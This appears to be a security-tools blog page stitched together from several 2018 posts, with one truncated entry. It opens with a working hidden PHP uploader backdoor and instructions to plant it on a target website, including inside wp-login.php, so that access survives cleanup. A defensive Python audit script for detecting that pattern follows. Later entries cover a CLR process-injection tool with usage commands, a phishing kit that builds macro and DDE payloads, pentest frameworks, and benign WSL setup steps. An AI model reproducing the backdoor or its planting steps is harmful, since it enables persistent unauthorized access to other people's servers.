How to Install a Hidden Uploader Script on a Website

- Thursday, November 22, 2018
How to Install a Hidden Uploader Script on a Website - This time we will discuss installing a hidden uploader script on our target website so that we do not lose access.

Hidden Uploader PHP Script
It is usually used to hide our uploader, so I usually name the file index.php. Just copy the following file:
<?php
if(isset($_GET["uploader"]))
 {
  echo"<font color=#ffffff>".php_uname()."";
  print "\n";$disable_functions = @ini_get("disable_functions"); 
  echo "<br>DisablePHP=".$disable_functions; print "\n"; 
  echo"<br><form method=post enctype=multipart/form-data>"; 
  echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; 
    if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal uploa sayang";
}
} 
}
Suppose we find a target whose index.php is empty, for example:
http://target.com/wp-content/uploads
Then we upload the hidden uploader file, which we named index.php, to the directory where index.php is empty. Then we open:
http://target.com/wp-content/uploads/index.php
It will appear blank. To call up the uploader, add the query to the URL so that it looks like this:
http://target.com/wp-content/uploads/index.php?uploader
The uploader will then be displayed.
This method is usually used as a backup backdoor: if our backdoor has been deleted by the administrator, we can still upload a new backdoor.

By the way, this uploader script can also be inserted into other scripts. My favorite place is wp-login.php if the target is WordPress. If the target is something else, just put it in the admin login section.
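
From the defender's side, the pattern described in this post leaves recognizable traces: non-trivial PHP inside an uploads directory, an upload handler that only appears behind a query-string check, and file-upload code inside a login script. The following Python audit is an added example, not part of the original post; the names `audit_php` and `scan_tree`, the 64-character threshold and the two sample sources are assumptions constructed for illustration.

```python
import os
import re

# Heuristics for the traits described above (constructed for this example).
UPLOAD_SINK = re.compile(r"\b(copy|move_uploaded_file)\s*\(\s*\$_FILES", re.I)
QUERY_GATE = re.compile(r"isset\s*\(\s*\$_(GET|REQUEST)\s*\[", re.I)
RECON = re.compile(r"\bphp_uname\b|ini_get\s*\(\s*[\"']disable_functions", re.I)
UPLOAD_DIR = re.compile(r"(^|/)wp-content/uploads/.*\.php$", re.I)
LOGIN_FILE = re.compile(r"(^|/)[^/]*login[^/]*\.php$", re.I)

# Constructed samples: a placeholder index and a file showing the traits.
PLACEHOLDER = "<?php\n// Silence is golden.\n"
SUSPECT = (
    '<?php if (isset($_GET["x"])) { echo php_uname(); '
    'if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "ok"; } }'
)


def audit_php(relpath: str, source: str) -> list[str]:
    """Return the reasons a PHP file deserves manual review (empty = none)."""
    path = relpath.replace("\\", "/")
    reasons = []
    has_sink = bool(UPLOAD_SINK.search(source))
    # An uploads tree should hold media; a placeholder index.php, if any,
    # is only a few bytes long (the 64-character threshold is an assumption).
    if UPLOAD_DIR.search(path) and len(source.strip()) > 64:
        reasons.append("non-trivial PHP inside uploads directory")
    if has_sink and QUERY_GATE.search(source):
        reasons.append("upload handler gated on a query parameter")
    if has_sink and LOGIN_FILE.search(path):
        reasons.append("file-upload code inside a login script")
    if has_sink and RECON.search(source):
        reasons.append("upload handler combined with host fingerprinting")
    return reasons


def scan_tree(root: str) -> dict[str, list[str]]:
    """Audit every .php file under root; map relative path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                reasons = audit_php(os.path.relpath(full, root), fh.read())
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings
```

Hits are triage leads rather than verdicts: legitimate plugins also handle uploads, so compare each flagged file against a known-good copy from the original release.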

Clrinject - Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

- Wednesday, October 10, 2018

Injects a C# EXE or DLL assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process's classes and therefore affect its internal state.

Usage
clrinject-cli.exe -p <processId/processName> -a <assemblyFile>
Opens the process with id <processId> or name <processName>, injects the <assemblyFile> EXE and executes its Main method.

Additional options
  • -e Enumerates all loaded CLR Runtimes and created AppDomains.
  • -d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.
  • -i <namespace>.<className> Create an instance of class <className> from namespace <namespace>.

Examples

Usage examples
  • clrinject-cli.exe -p victim.exe -e
    (Enumerate Runtimes and AppDomains from victim.exe)
  • clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
    (Inject invader.exe into second AppDomain from process with id 1234)
  • clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
    (Create instance of Invader inside every AppDomain in victim.exe)
  • clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
    (Inject x64 assembly into x64 process)

Injectable assembly example
The following code can be compiled as a C# executable and then injected into a PowerShell process. It accesses static instances of internal PowerShell classes to change the console text color to green.
using System;
using System.Reflection;

using Microsoft.PowerShell;
using System.Management.Automation.Host;

namespace Invader
{
    class Invader
    {
        static void Main(string[] args)
        {
            try
            {
                var powerShellAssembly = typeof(ConsoleShell).Assembly;
                var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null);

                var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                ui.RawUI.ForegroundColor = ConsoleColor.Green;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }
    }
}
Injection command:
clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Note: We have not tested this tool; if you have questions, please visit the link below directly.

ANDRAX - The First And Unique Penetration Testing Platform For Android Smartphones

- Tuesday, October 9, 2018

ANDRAX The first and unique Penetration Testing platform for Android smartphones
What is ANDRAX
ANDRAX is a penetration testing platform developed specifically for Android smartphones. ANDRAX can run natively on Android, so it behaves like a common Linux distribution, but more powerful t

Docker TOR Hidden Service - Easily Setup A Hidden Service Inside The Tor Network

Easily run a hidden service inside the Tor network with this container
Generate the skeleton configuration for your hidden service, replacing <pattern> with the name pattern for your hidden service. For example, if you want your hidden service address to contain the word 'boss', just use this word as the argument. You can use regular expressions: ^boss will generate an address which starts with 'boss'. Be aware that the longer the pattern, the more time it will take to generate.

docker run -it --rm -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx generate <pattern>
Create a container named 'hiddensite' to serve your generated hidden service
docker run -d --restart=always --name hiddensite -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx 

Example
Let's create a hidden service with the name beginning with strm.

docker pull strm/tor-hiddenservice-nginx
Wait for the container image to be downloaded. Then we can generate our site skeleton:
$ docker run -it --rm -v $(pwd)/web:/web strm/tor-hiddenservice-nginx generate ^strm
[+] Generating the address with mask: ^strm
[+] Found matching domain after 137072 tries: strmfyygjp5st54g.onion
[+] Generating nginx configuration for site  strmfyygjp5st54g.onion
[+] Creating www folder
[+] Generating index.html template
Now that we have our skeleton generated, we can run the container with:
docker run -d --restart=always --name hiddensite \
       -v $(pwd)/web:/web strm/tor-hiddenservice-nginx
And you have the service running! :)
Troubleshoot
  • 403 error on nginx: check your directory and folder permissions. Nginx runs as the "hidden" user, whose UID is 666; check that you have given this user access to the /web/www folder (that is, the host folder mapped to it).

Build
docker build -t strm/tor-hiddenservice-nginx .

Run
docker run -d --restart=always --name hiddensite \
       -v $(pwd)/web:/web strm/tor-hiddenservice-nginx

Shell
docker run -it --rm -v $(pwd)/web:/web \
       --entrypoint /bin/bash strm/tor-hiddenservice-nginx

Camelishing Social Engineering Tool

- Sunday, October 7, 2018
Camelishing Social Engineering Tool - Camelishing is a tool for performing social engineering, commonly called "soceng". If you do not know what soceng is, it is a trick for manipulating (deceiving) someone in order to trap them and obtain information from the victim.

The Camelishing tool runs on Windows with Python 3 installed. Before installing this tool, install Python 3 first here, and of course you should already have Microsoft Office installed as well.

Contact

[!]CONTACT[!]
| Coded Abdulaziz ALTUNTAŞ |
| Email: a.azizaltuntas@gmail.com |
| Github: github/azizaltuntas     |
| Twitter: @esccopyright          |

Features

1-Bulk email sending
2-Basic Python Agent Creator
3-Office Excel Macro Creator
4-DDE Excel Creator(or Custom Payload)
5-Return Information
 *[Mail Open Track]
 *[Agent Open Track]

6-AutoSave
7-Statistics Report
8-User Control

Installation Modules

$ pip install -r requirements.txt
$ Install Microsoft Office

If Installation Failed please try to

Install Python 3.6 & Pip3 (Just install Python 3.6 Pip already comes with it!)
Use pip3 to install the requirements
-------------------------
$ pip3 install -r requirements.txt

If you get Error to create Macro

Please follow the steps below! 

Tested and Supported

[+]Windows 7
[+]Windows 10

+SCREENSHOT

Mail Sender

[+] Note :  Compress and send the exe file(rar,zip)

[+] Start Project : python start.py

[Screenshots: Macro Creator, Agent Creator, Agent, DDE Creator, General Setting, Mail Send, Open Mail, Return Information, Statistic Report]

    DarkSpiritz - A Penetration Testing Framework For UNIX Systems

    - Saturday, October 6, 2018

    What is DarkSpiritz?

    Created by the SecTel Team, it was a project by one of the owners to update and clean up an older pentesting framework he had created into something updated and modern. DarkSpiritz is a revamp of the very popular framework known as "Roxysploit". You may be familiar with this framework, and if you are, it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use Metasploit, setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins, or you can head to our wiki here. If you need any help, feel free to contact us at sectel.team@protonmail.com.
    Getting Started
    Clone the repository with git:
    git clone https://github.com/DarkSpiritz/DarkSpiritz.git
    DarkSpiritz wiki available here
    To install DarkSpiritz clone the github repo and run:
    sudo python installer.py
    This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:
    python main.py
    from within the same directory as DarkSpiritz.
    You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

    Features:
    These are the features the DarkSpiritz Team prides itself on in this program:
    • Real Time Updating of Configuration
    • Never a need to restart the program even when adding plugins or editing them.
    • Easy to use UX
    • Multi-functionality


    Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

    - Monday, September 24, 2018

    Leaked? is a checking tool for leaked hash codes, passwords and emails. It uses the leakz module from Aidan Holland, and the leakz module uses an API from Aurelius Wendelken.
    Leaked? can work on any OS that supports Python 3 and 2.

    What's new?
    • Check email leaked
    • Update
    • More friendly for users
    • Support Python 2 and 3

    Features
    • Check passwords leaked
    • Check hash code leaked
    • Check email leaked NEW!
    • Update NEW!
    • Exit
    • About Author

    Install and Run in Linux
    sudo apt update && sudo apt install python3 python3-pip
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip3 install -r requirements.txt
    pip install -r requirements.txt
    python3 leaked.py
    or python leaked.py

    Install and Run in Windows
    Download and run the Python 3 setup file from Python.org. In the Python 3 installer, enable "Add Python 3.7 to PATH" and "For all users".
    Download and run the Git setup file from Git-scm.com, and choose "Use Git from Windows Command Prompt".
    After that, run Command Prompt or PowerShell and enter these commands:
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip install -r requirements.txt
    python leaked.py

    Update Leaked?: git pull -f

    Notes
    Leaked? uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken
    Follow their Twitter accounts!


    Install the Windows Subsystem for Linux on Windows 10

    - Sunday, September 23, 2018

    Enable the Windows Subsystem for Linux
       Before installing any Linux distros for WSL, you must ensure that the "Windows Subsystem for Linux" optional feature is enabled:

          Open PowerShell as Administrator and run:
          Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

       Restart your computer when prompted.

    Install your Linux Distribution of Choice
       To download and install your preferred distro(s), you have three choices:
        * Download and install from the Windows Store (see below)
        * Download and install from the Command-Line/Script (read the manual installation instructions)
        * Download and manually unpack and install (for Windows Server - instructions here)

    Windows 10 Fall Creators Update and later: Install from the Microsoft Store
     This section is for Windows build 16215 or later. Follow these steps to check your build. For earlier versions of Windows 10, follow these instructions using lxrun.

    1. Open the Microsoft Store and choose your favorite Linux distribution.

       The following links will open the Windows store page for each distribution:
        * Ubuntu
        * OpenSUSE
        * SLES
        * Kali Linux and Debian GNU/Linux

    2. From the distro's page, select "Get".

    Complete initialization of your distro
       Now that your Linux distro is installed, you must initialize your new distro instance once, before it can be used.

    Troubleshooting:
       Below are related errors and suggested fixes. Refer to the WSL troubleshooting page for other common errors and their solutions.

       Installation failed with error 0x80070003
        * The Windows Subsystem for Linux only runs on your system drive (usually this is your C: drive). Make sure that distros are stored on your system drive:
        * Open Settings -> Storage -> More Storage Settings: Change where new content is saved


    Manually download Windows Subsystem for Linux distro packages


    There are several scenarios in which you may not be able (or want) to install WSL Linux distros via the Windows Store. Specifically, you may be running a Windows Server or Long-Term Servicing (LTSB/LTSC) desktop OS SKU that doesn't support the Windows Store, or your corporate network policies and/or admins do not permit Windows Store usage in your environment.

    In these cases, while WSL itself is available, how do you download and install Linux distros in WSL if you can't access the store?

    Note:
     Command-line shell environments including CMD, PowerShell and Linux/WSL distros are not permitted to run on Windows 10 S Mode. This restriction exists in order to ensure the integrity and safety goals that S Mode delivers: Read this post for more information.

    Downloading distros
       If the Windows Store app is not available, you can download and manually install Linux distros by clicking these links:
        * Ubuntu 18.04 and Ubuntu 18.04 ARM
        * Ubuntu 16.04
        * Debian GNU/Linux
        * Kali Linux
        * OpenSUSE
        * SLES

       This will cause the <distro>.appx packages to download to a folder of your choosing. Follow the installation instructions to install your downloaded distro(s).

    Downloading distros via the Command-Line
       If you prefer, you can also download your preferred distro(s) via the Command-Line:

       Download using PowerShell
          To download distros using PowerShell, use the Invoke-WebRequest cmdlet. Here's a sample instruction to download Ubuntu 16.04.
          Enter this following command:
          Invoke-WebRequest -Uri https://aka.ms/wsl-ubuntu-1604 -OutFile Ubuntu.appx -UseBasicParsing

          Tip:
          If the download is taking a long time, turn off the progress bar by setting $ProgressPreference = 'SilentlyContinue'

       Download using curl
          Windows 10 Spring 2018 Update (or later) includes the popular curl command-line utility with which you can invoke web requests (i.e. HTTP GET, POST, PUT, etc. commands) from the command line. You can use curl.exe to download the above distros. Open Command Prompt and enter this command:
          curl.exe -L -o ubuntu-1604.appx https://aka.ms/wsl-ubuntu-1604

          In the above example, curl.exe is executed (not just curl) to ensure that, in PowerShell, the real curl executable is invoked, not the PowerShell curl alias for Invoke-WebRequest.

          Note: Using curl might be preferable if you have to invoke/script download steps using Cmd shell and/or .bat / .cmd scripts.

    Installing your distro
       For instructions on how to install your downloaded distro(s), please refer to the Windows Desktop or Windows Server installation instructions.